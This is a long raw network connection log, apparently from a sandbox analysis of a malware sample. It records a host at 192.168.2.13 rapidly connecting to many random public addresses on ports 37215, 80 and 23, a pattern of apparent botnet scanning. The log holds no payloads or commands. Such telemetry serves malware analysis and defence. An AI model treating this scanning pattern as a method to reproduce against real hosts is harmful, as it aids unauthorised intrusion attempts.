                            Jun 10, 2024 15:37:59.473119974 CEST3721530401156.85.168.164192.168.2.13
                            Jun 10, 2024 15:37:59.473121881 CEST3040137215192.168.2.13197.169.37.32
                            Jun 10, 2024 15:37:59.473133087 CEST801683392.126.239.180192.168.2.13
                            Jun 10, 2024 15:37:59.473140955 CEST1683380192.168.2.1320.163.218.116
                            Jun 10, 2024 15:37:59.473145008 CEST372153040141.159.234.132192.168.2.13
                            Jun 10, 2024 15:37:59.473150015 CEST3040137215192.168.2.13156.85.168.164
                            Jun 10, 2024 15:37:59.473157883 CEST3721530401197.159.57.193192.168.2.13
                            Jun 10, 2024 15:37:59.473170042 CEST8016833161.106.196.70192.168.2.13
                            Jun 10, 2024 15:37:59.473179102 CEST3040137215192.168.2.1341.159.234.132
                            Jun 10, 2024 15:37:59.473181009 CEST8016833120.127.248.215192.168.2.13
                            Jun 10, 2024 15:37:59.473193884 CEST801683380.246.211.214192.168.2.13
                            Jun 10, 2024 15:37:59.473206043 CEST801683324.223.44.225192.168.2.13
                            Jun 10, 2024 15:37:59.473217010 CEST372153040141.148.67.86192.168.2.13
                            Jun 10, 2024 15:37:59.473228931 CEST8016833178.116.76.220192.168.2.13
                            Jun 10, 2024 15:37:59.473231077 CEST1683380192.168.2.1380.246.211.214
                            Jun 10, 2024 15:37:59.473241091 CEST1683380192.168.2.1324.223.44.225
                            Jun 10, 2024 15:37:59.473241091 CEST801683376.87.100.69192.168.2.13
                            Jun 10, 2024 15:37:59.473248959 CEST1683380192.168.2.1392.126.239.180
                            Jun 10, 2024 15:37:59.473248959 CEST3040137215192.168.2.1341.148.67.86
                            Jun 10, 2024 15:37:59.473264933 CEST1683380192.168.2.13178.116.76.220
                            Jun 10, 2024 15:37:59.473278999 CEST1683380192.168.2.1376.87.100.69
                            Jun 10, 2024 15:37:59.473285913 CEST3040137215192.168.2.13197.159.57.193
                            Jun 10, 2024 15:37:59.473285913 CEST1683380192.168.2.13161.106.196.70
                            Jun 10, 2024 15:37:59.473285913 CEST1683380192.168.2.13120.127.248.215
                            Jun 10, 2024 15:37:59.473507881 CEST8016833200.227.24.116192.168.2.13
                            Jun 10, 2024 15:37:59.473548889 CEST1683380192.168.2.13200.227.24.116
                            Jun 10, 2024 15:37:59.473556995 CEST801683380.234.35.77192.168.2.13
                            Jun 10, 2024 15:37:59.473571062 CEST801683386.248.77.229192.168.2.13
                            Jun 10, 2024 15:37:59.473586082 CEST3721530401156.193.172.152192.168.2.13
                            Jun 10, 2024 15:37:59.473592043 CEST5452623192.168.2.13186.246.195.187
                            Jun 10, 2024 15:37:59.473597050 CEST1683380192.168.2.1380.234.35.77
                            Jun 10, 2024 15:37:59.473598003 CEST372153040141.231.47.111192.168.2.13
                            Jun 10, 2024 15:37:59.473603964 CEST1683380192.168.2.1386.248.77.229
                            Jun 10, 2024 15:37:59.473611116 CEST801683320.192.68.43192.168.2.13
                            Jun 10, 2024 15:37:59.473618031 CEST3040137215192.168.2.13156.193.172.152
                            Jun 10, 2024 15:37:59.473623037 CEST372153040141.199.79.204192.168.2.13
                            Jun 10, 2024 15:37:59.473634005 CEST801683364.204.248.79192.168.2.13
                            Jun 10, 2024 15:37:59.473637104 CEST3040137215192.168.2.1341.231.47.111
                            Jun 10, 2024 15:37:59.473643064 CEST1683380192.168.2.1320.192.68.43
                            Jun 10, 2024 15:37:59.473647118 CEST372153040141.101.247.5192.168.2.13
                            Jun 10, 2024 15:37:59.473653078 CEST3040137215192.168.2.1341.199.79.204
                            Jun 10, 2024 15:37:59.473659992 CEST372153040141.30.242.53192.168.2.13
                            Jun 10, 2024 15:37:59.473674059 CEST8016833180.39.72.148192.168.2.13
                            Jun 10, 2024 15:37:59.473679066 CEST3040137215192.168.2.1341.101.247.5
                            Jun 10, 2024 15:37:59.473685026 CEST1683380192.168.2.1364.204.248.79
                            Jun 10, 2024 15:37:59.473686934 CEST3721530401197.11.108.159192.168.2.13
                            Jun 10, 2024 15:37:59.473690033 CEST3040137215192.168.2.1341.30.242.53
                            Jun 10, 2024 15:37:59.473700047 CEST801683361.60.152.125192.168.2.13
                            Jun 10, 2024 15:37:59.473707914 CEST1683380192.168.2.13180.39.72.148
                            Jun 10, 2024 15:37:59.473711967 CEST8016833205.31.133.92192.168.2.13
                            Jun 10, 2024 15:37:59.473725080 CEST3040137215192.168.2.13197.11.108.159
                            Jun 10, 2024 15:37:59.473730087 CEST1683380192.168.2.1361.60.152.125
                            Jun 10, 2024 15:37:59.473737001 CEST801683365.70.76.83192.168.2.13
                            Jun 10, 2024 15:37:59.473746061 CEST1683380192.168.2.13205.31.133.92
                            Jun 10, 2024 15:37:59.473750114 CEST372153040141.18.25.58192.168.2.13
                            Jun 10, 2024 15:37:59.473762989 CEST3721530401156.245.214.148192.168.2.13
                            Jun 10, 2024 15:37:59.473773956 CEST1683380192.168.2.1365.70.76.83
                            Jun 10, 2024 15:37:59.473773956 CEST3721530401197.130.54.44192.168.2.13
                            Jun 10, 2024 15:37:59.473786116 CEST8016833178.75.129.135192.168.2.13
                            Jun 10, 2024 15:37:59.473792076 CEST3040137215192.168.2.1341.18.25.58
                            Jun 10, 2024 15:37:59.473798037 CEST3721530401197.6.221.182192.168.2.13
                            Jun 10, 2024 15:37:59.473798990 CEST3040137215192.168.2.13156.245.214.148
                            Jun 10, 2024 15:37:59.473810911 CEST8016833199.14.48.234192.168.2.13
                            Jun 10, 2024 15:37:59.473810911 CEST3040137215192.168.2.13197.130.54.44
                            Jun 10, 2024 15:37:59.473810911 CEST1683380192.168.2.13178.75.129.135
                            Jun 10, 2024 15:37:59.473823071 CEST801683377.158.144.153192.168.2.13
                            Jun 10, 2024 15:37:59.473829985 CEST3040137215192.168.2.13197.6.221.182
                            Jun 10, 2024 15:37:59.473834991 CEST801683373.226.206.80192.168.2.13
                            Jun 10, 2024 15:37:59.473846912 CEST801683385.213.97.130192.168.2.13
                            Jun 10, 2024 15:37:59.473846912 CEST1683380192.168.2.13199.14.48.234
                            Jun 10, 2024 15:37:59.473850965 CEST1683380192.168.2.1377.158.144.153
                            Jun 10, 2024 15:37:59.473859072 CEST801683335.110.254.128192.168.2.13
                            Jun 10, 2024 15:37:59.473864079 CEST1683380192.168.2.1373.226.206.80
                            Jun 10, 2024 15:37:59.473870993 CEST8016833113.100.75.240192.168.2.13
                            Jun 10, 2024 15:37:59.473882914 CEST8016833147.13.253.87192.168.2.13
                            Jun 10, 2024 15:37:59.473882914 CEST1683380192.168.2.1385.213.97.130
                            Jun 10, 2024 15:37:59.473895073 CEST1683380192.168.2.1335.110.254.128
                            Jun 10, 2024 15:37:59.473903894 CEST1683380192.168.2.13113.100.75.240
                            Jun 10, 2024 15:37:59.473915100 CEST1683380192.168.2.13147.13.253.87
                            Jun 10, 2024 15:37:59.474286079 CEST801683363.100.122.35192.168.2.13
                            Jun 10, 2024 15:37:59.474309921 CEST8016833189.4.205.250192.168.2.13
                            Jun 10, 2024 15:37:59.474322081 CEST3721530401197.77.27.57192.168.2.13
                            Jun 10, 2024 15:37:59.474327087 CEST1683380192.168.2.1363.100.122.35
                            Jun 10, 2024 15:37:59.474342108 CEST1683380192.168.2.13189.4.205.250
                            Jun 10, 2024 15:37:59.474344015 CEST801683373.27.208.44192.168.2.13
                            Jun 10, 2024 15:37:59.474347115 CEST3040137215192.168.2.13197.77.27.57
                            Jun 10, 2024 15:37:59.474356890 CEST801683343.197.76.131192.168.2.13
                            Jun 10, 2024 15:37:59.474370003 CEST8016833188.19.125.242192.168.2.13
                            Jun 10, 2024 15:37:59.474381924 CEST8016833136.187.169.238192.168.2.13
                            Jun 10, 2024 15:37:59.474390030 CEST1683380192.168.2.1343.197.76.131
                            Jun 10, 2024 15:37:59.474394083 CEST8016833155.242.180.94192.168.2.13
                            Jun 10, 2024 15:37:59.474401951 CEST1683380192.168.2.13188.19.125.242
                            Jun 10, 2024 15:37:59.474405050 CEST1683380192.168.2.1373.27.208.44
                            Jun 10, 2024 15:37:59.474406004 CEST801683397.78.180.40192.168.2.13
                            Jun 10, 2024 15:37:59.474417925 CEST801683380.79.4.13192.168.2.13
                            Jun 10, 2024 15:37:59.474420071 CEST1683380192.168.2.13136.187.169.238
                            Jun 10, 2024 15:37:59.474423885 CEST1683380192.168.2.13155.242.180.94
                            Jun 10, 2024 15:37:59.474431992 CEST3721530401197.53.181.102192.168.2.13
                            Jun 10, 2024 15:37:59.474433899 CEST1683380192.168.2.1397.78.180.40
                            Jun 10, 2024 15:37:59.474445105 CEST8016833172.186.91.166192.168.2.13
                            Jun 10, 2024 15:37:59.474447012 CEST1683380192.168.2.1380.79.4.13
                            Jun 10, 2024 15:37:59.474468946 CEST3721530401156.127.85.183192.168.2.13
                            Jun 10, 2024 15:37:59.474478960 CEST3040137215192.168.2.13197.53.181.102
                            Jun 10, 2024 15:37:59.474478960 CEST1683380192.168.2.13172.186.91.166
                            Jun 10, 2024 15:37:59.474482059 CEST8016833223.101.71.177192.168.2.13
                            Jun 10, 2024 15:37:59.474493980 CEST3721530401156.91.67.212192.168.2.13
                            Jun 10, 2024 15:37:59.474503994 CEST3040137215192.168.2.13156.127.85.183
                            Jun 10, 2024 15:37:59.474505901 CEST3721530401156.131.225.23192.168.2.13
                            Jun 10, 2024 15:37:59.474514961 CEST1683380192.168.2.13223.101.71.177
                            Jun 10, 2024 15:37:59.474518061 CEST801683318.56.173.78192.168.2.13
                            Jun 10, 2024 15:37:59.474529982 CEST8016833163.111.8.68192.168.2.13
                            Jun 10, 2024 15:37:59.474534035 CEST3040137215192.168.2.13156.91.67.212
                            Jun 10, 2024 15:37:59.474543095 CEST3721530401156.134.62.117192.168.2.13
                            Jun 10, 2024 15:37:59.474545956 CEST3040137215192.168.2.13156.131.225.23
                            Jun 10, 2024 15:37:59.474550009 CEST1683380192.168.2.1318.56.173.78
                            Jun 10, 2024 15:37:59.474555016 CEST372153040141.194.69.224192.168.2.13
                            Jun 10, 2024 15:37:59.474560976 CEST1683380192.168.2.13163.111.8.68
                            Jun 10, 2024 15:37:59.474567890 CEST8016833119.73.219.135192.168.2.13
                            Jun 10, 2024 15:37:59.474580050 CEST3721530401156.175.50.158192.168.2.13
                            Jun 10, 2024 15:37:59.474581957 CEST3040137215192.168.2.13156.134.62.117
                            Jun 10, 2024 15:37:59.474582911 CEST3040137215192.168.2.1341.194.69.224
                            Jun 10, 2024 15:37:59.474591970 CEST3721530401156.108.94.105192.168.2.13
                            Jun 10, 2024 15:37:59.474602938 CEST1683380192.168.2.13119.73.219.135
                            Jun 10, 2024 15:37:59.474605083 CEST801683347.205.42.118192.168.2.13
                            Jun 10, 2024 15:37:59.474613905 CEST3040137215192.168.2.13156.175.50.158
                            Jun 10, 2024 15:37:59.474617004 CEST8016833153.158.156.7192.168.2.13
                            Jun 10, 2024 15:37:59.474627972 CEST3040137215192.168.2.13156.108.94.105
                            Jun 10, 2024 15:37:59.474628925 CEST3721530401197.171.45.100192.168.2.13
                            Jun 10, 2024 15:37:59.474637032 CEST1683380192.168.2.1347.205.42.118
                            Jun 10, 2024 15:37:59.474639893 CEST801683312.226.179.166192.168.2.13
                            Jun 10, 2024 15:37:59.474642992 CEST1683380192.168.2.13153.158.156.7
                            Jun 10, 2024 15:37:59.474652052 CEST8016833110.105.30.144192.168.2.13
                            Jun 10, 2024 15:37:59.474666119 CEST3040137215192.168.2.13197.171.45.100
                            Jun 10, 2024 15:37:59.474683046 CEST1683380192.168.2.1312.226.179.166
                            Jun 10, 2024 15:37:59.474694014 CEST1683380192.168.2.13110.105.30.144
                            Jun 10, 2024 15:37:59.475095987 CEST3721530401197.252.67.126192.168.2.13
                            Jun 10, 2024 15:37:59.475107908 CEST3721530401197.177.55.128192.168.2.13
                            Jun 10, 2024 15:37:59.475112915 CEST3282480192.168.2.1370.109.71.255
                            Jun 10, 2024 15:37:59.475121021 CEST3721530401156.22.231.73192.168.2.13
                            Jun 10, 2024 15:37:59.475130081 CEST3040137215192.168.2.13197.252.67.126
                            Jun 10, 2024 15:37:59.475136042 CEST801683392.198.235.153192.168.2.13
                            Jun 10, 2024 15:37:59.475158930 CEST3040137215192.168.2.13197.177.55.128
                            Jun 10, 2024 15:37:59.475158930 CEST3040137215192.168.2.13156.22.231.73
                            Jun 10, 2024 15:37:59.475172997 CEST3721530401197.3.144.181192.168.2.13
                            Jun 10, 2024 15:37:59.475184917 CEST372153040141.154.242.218192.168.2.13
                            Jun 10, 2024 15:37:59.475184917 CEST1683380192.168.2.1392.198.235.153
                            Jun 10, 2024 15:37:59.475198030 CEST801683341.255.9.53192.168.2.13
                            Jun 10, 2024 15:37:59.475207090 CEST3040137215192.168.2.13197.3.144.181
                            Jun 10, 2024 15:37:59.475209951 CEST3721530401197.122.240.56192.168.2.13
                            Jun 10, 2024 15:37:59.475219965 CEST3040137215192.168.2.1341.154.242.218
                            Jun 10, 2024 15:37:59.475223064 CEST3721530401197.90.255.62192.168.2.13
                            Jun 10, 2024 15:37:59.475227118 CEST1683380192.168.2.1341.255.9.53
                            Jun 10, 2024 15:37:59.475235939 CEST8016833115.14.180.117192.168.2.13
                            Jun 10, 2024 15:37:59.475244045 CEST3040137215192.168.2.13197.122.240.56
                            Jun 10, 2024 15:37:59.475248098 CEST3721530401197.65.165.66192.168.2.13
                            Jun 10, 2024 15:37:59.475254059 CEST3040137215192.168.2.13197.90.255.62
                            Jun 10, 2024 15:37:59.475261927 CEST801683327.107.20.99192.168.2.13
                            Jun 10, 2024 15:37:59.475274086 CEST1683380192.168.2.13115.14.180.117
                            Jun 10, 2024 15:37:59.475276947 CEST3721530401156.108.239.24192.168.2.13
                            Jun 10, 2024 15:37:59.475277901 CEST3040137215192.168.2.13197.65.165.66
                            Jun 10, 2024 15:37:59.475290060 CEST372153040141.204.128.204192.168.2.13
                            Jun 10, 2024 15:37:59.475300074 CEST1683380192.168.2.1327.107.20.99
                            Jun 10, 2024 15:37:59.475301981 CEST3721530401197.113.110.123192.168.2.13
                            Jun 10, 2024 15:37:59.475312948 CEST3040137215192.168.2.13156.108.239.24
                            Jun 10, 2024 15:37:59.475315094 CEST801683349.166.164.65192.168.2.13
                            Jun 10, 2024 15:37:59.475326061 CEST8016833154.157.108.239192.168.2.13
                            Jun 10, 2024 15:37:59.475336075 CEST3040137215192.168.2.13197.113.110.123
                            Jun 10, 2024 15:37:59.475337982 CEST8016833164.124.249.96192.168.2.13
                            Jun 10, 2024 15:37:59.475347042 CEST3040137215192.168.2.1341.204.128.204
                            Jun 10, 2024 15:37:59.475347042 CEST1683380192.168.2.1349.166.164.65
                            Jun 10, 2024 15:37:59.475348949 CEST8016833172.41.133.121192.168.2.13
                            Jun 10, 2024 15:37:59.475358009 CEST1683380192.168.2.13154.157.108.239
                            Jun 10, 2024 15:37:59.475362062 CEST8016833104.146.129.255192.168.2.13
                            Jun 10, 2024 15:37:59.475373030 CEST8016833112.185.246.97192.168.2.13
                            Jun 10, 2024 15:37:59.475373983 CEST1683380192.168.2.13164.124.249.96
                            Jun 10, 2024 15:37:59.475385904 CEST8016833137.192.36.34192.168.2.13
                            Jun 10, 2024 15:37:59.475393057 CEST1683380192.168.2.13104.146.129.255
                            Jun 10, 2024 15:37:59.475397110 CEST8016833151.245.233.148192.168.2.13
                            Jun 10, 2024 15:37:59.475408077 CEST1683380192.168.2.13112.185.246.97
                            Jun 10, 2024 15:37:59.475409031 CEST3721530401156.165.153.169192.168.2.13
                            Jun 10, 2024 15:37:59.475421906 CEST3721530401156.64.50.166192.168.2.13
                            Jun 10, 2024 15:37:59.475428104 CEST1683380192.168.2.13151.245.233.148
                            Jun 10, 2024 15:37:59.475435019 CEST80168338.60.14.111192.168.2.13
                            Jun 10, 2024 15:37:59.475445032 CEST3040137215192.168.2.13156.165.153.169
                            Jun 10, 2024 15:37:59.475446939 CEST3721530401156.138.70.55192.168.2.13
                            Jun 10, 2024 15:37:59.475455999 CEST3040137215192.168.2.13156.64.50.166
                            Jun 10, 2024 15:37:59.475459099 CEST801683387.244.191.238192.168.2.13
                            Jun 10, 2024 15:37:59.475469112 CEST1683380192.168.2.138.60.14.111
                            Jun 10, 2024 15:37:59.475476027 CEST3040137215192.168.2.13156.138.70.55
                            Jun 10, 2024 15:37:59.475488901 CEST1683380192.168.2.1387.244.191.238
                            Jun 10, 2024 15:37:59.475598097 CEST1683380192.168.2.13137.192.36.34
                            Jun 10, 2024 15:37:59.475610018 CEST1683380192.168.2.13172.41.133.121
                            Jun 10, 2024 15:37:59.475914955 CEST8016833165.42.5.94192.168.2.13
                            Jun 10, 2024 15:37:59.475928068 CEST372153040141.177.65.80192.168.2.13
                            Jun 10, 2024 15:37:59.475939989 CEST8016833103.180.106.234192.168.2.13
                            Jun 10, 2024 15:37:59.475959063 CEST1683380192.168.2.13165.42.5.94
                            Jun 10, 2024 15:37:59.475964069 CEST801683347.31.252.153192.168.2.13
                            Jun 10, 2024 15:37:59.475965977 CEST3040137215192.168.2.1341.177.65.80
                            Jun 10, 2024 15:37:59.475965977 CEST1683380192.168.2.13103.180.106.234
                            Jun 10, 2024 15:37:59.475976944 CEST8016833116.64.211.112192.168.2.13
                            Jun 10, 2024 15:37:59.475989103 CEST3721530401156.30.46.175192.168.2.13
                            Jun 10, 2024 15:37:59.475996017 CEST1683380192.168.2.1347.31.252.153
                            Jun 10, 2024 15:37:59.476001024 CEST8016833121.66.37.22192.168.2.13
                            Jun 10, 2024 15:37:59.476005077 CEST1683380192.168.2.13116.64.211.112
                            Jun 10, 2024 15:37:59.476015091 CEST3721530401156.122.43.20192.168.2.13
                            Jun 10, 2024 15:37:59.476016045 CEST3040137215192.168.2.13156.30.46.175
                            Jun 10, 2024 15:37:59.476027966 CEST801683367.138.158.3192.168.2.13
                            Jun 10, 2024 15:37:59.476032972 CEST1683380192.168.2.13121.66.37.22
                            Jun 10, 2024 15:37:59.476041079 CEST8016833142.93.84.53192.168.2.13
                            Jun 10, 2024 15:37:59.476048946 CEST3040137215192.168.2.13156.122.43.20
                            Jun 10, 2024 15:37:59.476052046 CEST801683382.31.158.212192.168.2.13
                            Jun 10, 2024 15:37:59.476061106 CEST1683380192.168.2.1367.138.158.3
                            Jun 10, 2024 15:37:59.476064920 CEST3721530401156.21.253.10192.168.2.13
                            Jun 10, 2024 15:37:59.476073027 CEST1683380192.168.2.13142.93.84.53
                            Jun 10, 2024 15:37:59.476078033 CEST3721530401197.45.49.45192.168.2.13
                            Jun 10, 2024 15:37:59.476082087 CEST1683380192.168.2.1382.31.158.212
                            Jun 10, 2024 15:37:59.476090908 CEST8016833177.132.104.239192.168.2.13
                            Jun 10, 2024 15:37:59.476103067 CEST801683382.115.241.32192.168.2.13
                            Jun 10, 2024 15:37:59.476103067 CEST3040137215192.168.2.13197.45.49.45
                            Jun 10, 2024 15:37:59.476114988 CEST8016833173.206.211.211192.168.2.13
                            Jun 10, 2024 15:37:59.476126909 CEST3721530401156.86.67.41192.168.2.13
                            Jun 10, 2024 15:37:59.476136923 CEST1683380192.168.2.1382.115.241.32
                            Jun 10, 2024 15:37:59.476138115 CEST372153040141.217.166.207192.168.2.13
                            Jun 10, 2024 15:37:59.476150990 CEST801683380.138.184.143192.168.2.13
                            Jun 10, 2024 15:37:59.476161003 CEST3040137215192.168.2.13156.86.67.41
                            Jun 10, 2024 15:37:59.476161957 CEST801683341.205.211.13192.168.2.13
                            Jun 10, 2024 15:37:59.476174116 CEST8016833209.251.75.100192.168.2.13
                            Jun 10, 2024 15:37:59.476185083 CEST80168338.67.93.32192.168.2.13
                            Jun 10, 2024 15:37:59.476186037 CEST3040137215192.168.2.13156.21.253.10
                            Jun 10, 2024 15:37:59.476186037 CEST1683380192.168.2.1380.138.184.143
                            Jun 10, 2024 15:37:59.476197958 CEST1683380192.168.2.1341.205.211.13
                            Jun 10, 2024 15:37:59.476202965 CEST1683380192.168.2.13177.132.104.239
                            Jun 10, 2024 15:37:59.476202965 CEST1683380192.168.2.13173.206.211.211
                            Jun 10, 2024 15:37:59.476202965 CEST3040137215192.168.2.1341.217.166.207
                            Jun 10, 2024 15:37:59.476202965 CEST1683380192.168.2.13209.251.75.100
                            Jun 10, 2024 15:37:59.476208925 CEST8016833204.85.79.250192.168.2.13
                            Jun 10, 2024 15:37:59.476221085 CEST8016833221.192.131.182192.168.2.13
                            Jun 10, 2024 15:37:59.476233006 CEST8016833206.109.139.234192.168.2.13
                            Jun 10, 2024 15:37:59.476237059 CEST1683380192.168.2.138.67.93.32
                            Jun 10, 2024 15:37:59.476244926 CEST372153040141.232.218.37192.168.2.13
                            Jun 10, 2024 15:37:59.476248026 CEST1683380192.168.2.13204.85.79.250
                            Jun 10, 2024 15:37:59.476257086 CEST801683385.165.52.150192.168.2.13
                            Jun 10, 2024 15:37:59.476257086 CEST1683380192.168.2.13221.192.131.182
                            Jun 10, 2024 15:37:59.476264954 CEST1683380192.168.2.13206.109.139.234
                            Jun 10, 2024 15:37:59.476269960 CEST8016833181.48.200.125192.168.2.13
                            Jun 10, 2024 15:37:59.476279020 CEST3040137215192.168.2.1341.232.218.37
                            Jun 10, 2024 15:37:59.476289988 CEST1683380192.168.2.1385.165.52.150
                            Jun 10, 2024 15:37:59.476304054 CEST1683380192.168.2.13181.48.200.125
                            Jun 10, 2024 15:37:59.476433992 CEST3721530401156.160.33.207192.168.2.13
                            Jun 10, 2024 15:37:59.476470947 CEST3040137215192.168.2.13156.160.33.207
                            Jun 10, 2024 15:37:59.476571083 CEST8016833141.237.220.58192.168.2.13
                            Jun 10, 2024 15:37:59.476584911 CEST8016833107.87.148.44192.168.2.13
                            Jun 10, 2024 15:37:59.476596117 CEST801683376.193.135.136192.168.2.13
                            Jun 10, 2024 15:37:59.476608038 CEST3721530401156.70.51.128192.168.2.13
                            Jun 10, 2024 15:37:59.476612091 CEST1683380192.168.2.13141.237.220.58
                            Jun 10, 2024 15:37:59.476619959 CEST801683323.44.133.64192.168.2.13
                            Jun 10, 2024 15:37:59.476624012 CEST1683380192.168.2.13107.87.148.44
                            Jun 10, 2024 15:37:59.476632118 CEST801683398.50.27.72192.168.2.13
                            Jun 10, 2024 15:37:59.476635933 CEST1683380192.168.2.1376.193.135.136
                            Jun 10, 2024 15:37:59.476639986 CEST3040137215192.168.2.13156.70.51.128
                            Jun 10, 2024 15:37:59.476644993 CEST3721530401197.131.147.145192.168.2.13
                            Jun 10, 2024 15:37:59.476649046 CEST1683380192.168.2.1323.44.133.64
                            Jun 10, 2024 15:37:59.476658106 CEST801683327.83.114.105192.168.2.13
                            Jun 10, 2024 15:37:59.476664066 CEST1683380192.168.2.1398.50.27.72
                            Jun 10, 2024 15:37:59.476670027 CEST8016833115.122.222.39192.168.2.13
                            Jun 10, 2024 15:37:59.476671934 CEST3040137215192.168.2.13197.131.147.145
                            Jun 10, 2024 15:37:59.476684093 CEST801683358.79.14.101192.168.2.13
                            Jun 10, 2024 15:37:59.476696014 CEST801683352.219.121.87192.168.2.13
                            Jun 10, 2024 15:37:59.476707935 CEST801683369.55.0.87192.168.2.13
                            Jun 10, 2024 15:37:59.476716042 CEST1683380192.168.2.1358.79.14.101
                            Jun 10, 2024 15:37:59.476718903 CEST372153040141.109.175.50192.168.2.13
                            Jun 10, 2024 15:37:59.476732016 CEST801683378.210.96.62192.168.2.13
                            Jun 10, 2024 15:37:59.476741076 CEST1683380192.168.2.13115.122.222.39
                            Jun 10, 2024 15:37:59.476742983 CEST1683380192.168.2.1369.55.0.87
                            Jun 10, 2024 15:37:59.476742983 CEST801683369.98.155.131192.168.2.13
                            Jun 10, 2024 15:37:59.476747036 CEST1683380192.168.2.1327.83.114.105
                            Jun 10, 2024 15:37:59.476747036 CEST1683380192.168.2.1352.219.121.87
                            Jun 10, 2024 15:37:59.476753950 CEST3040137215192.168.2.1341.109.175.50
                            Jun 10, 2024 15:37:59.476757050 CEST8016833186.42.206.105192.168.2.13
                            Jun 10, 2024 15:37:59.476758003 CEST1683380192.168.2.1378.210.96.62
                            Jun 10, 2024 15:37:59.476768970 CEST801683319.213.127.183192.168.2.13
                            Jun 10, 2024 15:37:59.476773024 CEST1683380192.168.2.1369.98.155.131
                            Jun 10, 2024 15:37:59.476782084 CEST372153040141.60.76.225192.168.2.13
                            Jun 10, 2024 15:37:59.476785898 CEST1683380192.168.2.13186.42.206.105
                            Jun 10, 2024 15:37:59.476794004 CEST372153040141.255.7.58192.168.2.13
                            Jun 10, 2024 15:37:59.476805925 CEST801683351.28.4.140192.168.2.13
                            Jun 10, 2024 15:37:59.476807117 CEST1683380192.168.2.1319.213.127.183
                            Jun 10, 2024 15:37:59.476819038 CEST801683397.44.41.112192.168.2.13
                            Jun 10, 2024 15:37:59.476820946 CEST3040137215192.168.2.1341.60.76.225
                            Jun 10, 2024 15:37:59.476826906 CEST3040137215192.168.2.1341.255.7.58
                            Jun 10, 2024 15:37:59.476834059 CEST8016833220.3.14.39192.168.2.13
                            Jun 10, 2024 15:37:59.476845980 CEST1683380192.168.2.1351.28.4.140
                            Jun 10, 2024 15:37:59.476846933 CEST372153040141.32.20.36192.168.2.13
                            Jun 10, 2024 15:37:59.476857901 CEST1683380192.168.2.1397.44.41.112
                            Jun 10, 2024 15:37:59.476857901 CEST1683380192.168.2.13220.3.14.39
                            Jun 10, 2024 15:37:59.476872921 CEST8016833170.152.145.43192.168.2.13
                            Jun 10, 2024 15:37:59.476886034 CEST372153040141.212.198.1192.168.2.13
                            Jun 10, 2024 15:37:59.476887941 CEST3040137215192.168.2.1341.32.20.36
                            Jun 10, 2024 15:37:59.476897955 CEST8016833107.129.25.87192.168.2.13
                            Jun 10, 2024 15:37:59.476910114 CEST3721530401197.171.235.195192.168.2.13
                            Jun 10, 2024 15:37:59.476922035 CEST801683383.164.93.245192.168.2.13
                            Jun 10, 2024 15:37:59.476926088 CEST3040137215192.168.2.1341.212.198.1
                            Jun 10, 2024 15:37:59.476933956 CEST801683347.57.140.37192.168.2.13
                            Jun 10, 2024 15:37:59.476937056 CEST1683380192.168.2.13107.129.25.87
                            Jun 10, 2024 15:37:59.476947069 CEST3721530401156.173.199.53192.168.2.13
                            Jun 10, 2024 15:37:59.476948023 CEST3040137215192.168.2.13197.171.235.195
                            Jun 10, 2024 15:37:59.476952076 CEST1683380192.168.2.1383.164.93.245
                            Jun 10, 2024 15:37:59.476963997 CEST1683380192.168.2.1347.57.140.37
                            Jun 10, 2024 15:37:59.476972103 CEST801683383.55.235.157192.168.2.13
                            Jun 10, 2024 15:37:59.476978064 CEST3040137215192.168.2.13156.173.199.53
                            Jun 10, 2024 15:37:59.476984978 CEST8016833146.75.232.210192.168.2.13
                            Jun 10, 2024 15:37:59.476998091 CEST8016833136.204.254.222192.168.2.13
                            Jun 10, 2024 15:37:59.476999998 CEST1683380192.168.2.13170.152.145.43
                            Jun 10, 2024 15:37:59.477006912 CEST1683380192.168.2.1383.55.235.157
                            Jun 10, 2024 15:37:59.477010012 CEST3721530401156.146.189.38192.168.2.13
                            Jun 10, 2024 15:37:59.477019072 CEST1683380192.168.2.13146.75.232.210
                            Jun 10, 2024 15:37:59.477021933 CEST801683388.210.139.240192.168.2.13
                            Jun 10, 2024 15:37:59.477031946 CEST1683380192.168.2.13136.204.254.222
                            Jun 10, 2024 15:37:59.477035046 CEST372153040141.19.65.133192.168.2.13
                            Jun 10, 2024 15:37:59.477039099 CEST3040137215192.168.2.13156.146.189.38
                            Jun 10, 2024 15:37:59.477046967 CEST1683380192.168.2.1388.210.139.240
                            Jun 10, 2024 15:37:59.477046967 CEST801683392.5.213.185192.168.2.13
                            Jun 10, 2024 15:37:59.477058887 CEST8016833173.250.73.80192.168.2.13
                            Jun 10, 2024 15:37:59.477071047 CEST3721530401156.113.189.207192.168.2.13
                            Jun 10, 2024 15:37:59.477077961 CEST3040137215192.168.2.1341.19.65.133
                            Jun 10, 2024 15:37:59.477086067 CEST1683380192.168.2.1392.5.213.185
                            Jun 10, 2024 15:37:59.477092981 CEST1683380192.168.2.13173.250.73.80
                            Jun 10, 2024 15:37:59.477097034 CEST3721530401156.38.45.195192.168.2.13
                            Jun 10, 2024 15:37:59.477106094 CEST3040137215192.168.2.13156.113.189.207
                            Jun 10, 2024 15:37:59.477109909 CEST80168332.198.225.49192.168.2.13
                            Jun 10, 2024 15:37:59.477123022 CEST8016833121.227.47.242192.168.2.13
                            Jun 10, 2024 15:37:59.477133989 CEST801683388.37.96.26192.168.2.13
                            Jun 10, 2024 15:37:59.477139950 CEST1683380192.168.2.132.198.225.49
                            Jun 10, 2024 15:37:59.477140903 CEST3040137215192.168.2.13156.38.45.195
                            Jun 10, 2024 15:37:59.477145910 CEST372153040141.100.69.139192.168.2.13
                            Jun 10, 2024 15:37:59.477158070 CEST8016833188.184.250.99192.168.2.13
                            Jun 10, 2024 15:37:59.477164984 CEST1683380192.168.2.13121.227.47.242
                            Jun 10, 2024 15:37:59.477164984 CEST1683380192.168.2.1388.37.96.26
                            Jun 10, 2024 15:37:59.477169991 CEST3721530401197.31.36.162192.168.2.13
                            Jun 10, 2024 15:37:59.477174044 CEST3040137215192.168.2.1341.100.69.139
                            Jun 10, 2024 15:37:59.477181911 CEST801683384.232.253.129192.168.2.13
                            Jun 10, 2024 15:37:59.477186918 CEST1683380192.168.2.13188.184.250.99
                            Jun 10, 2024 15:37:59.477194071 CEST3721530401156.41.151.47192.168.2.13
                            Jun 10, 2024 15:37:59.477205992 CEST3040137215192.168.2.13197.31.36.162
                            Jun 10, 2024 15:37:59.477205992 CEST8016833200.10.68.151192.168.2.13
                            Jun 10, 2024 15:37:59.477209091 CEST1683380192.168.2.1384.232.253.129
                            Jun 10, 2024 15:37:59.477220058 CEST801683373.47.8.22192.168.2.13
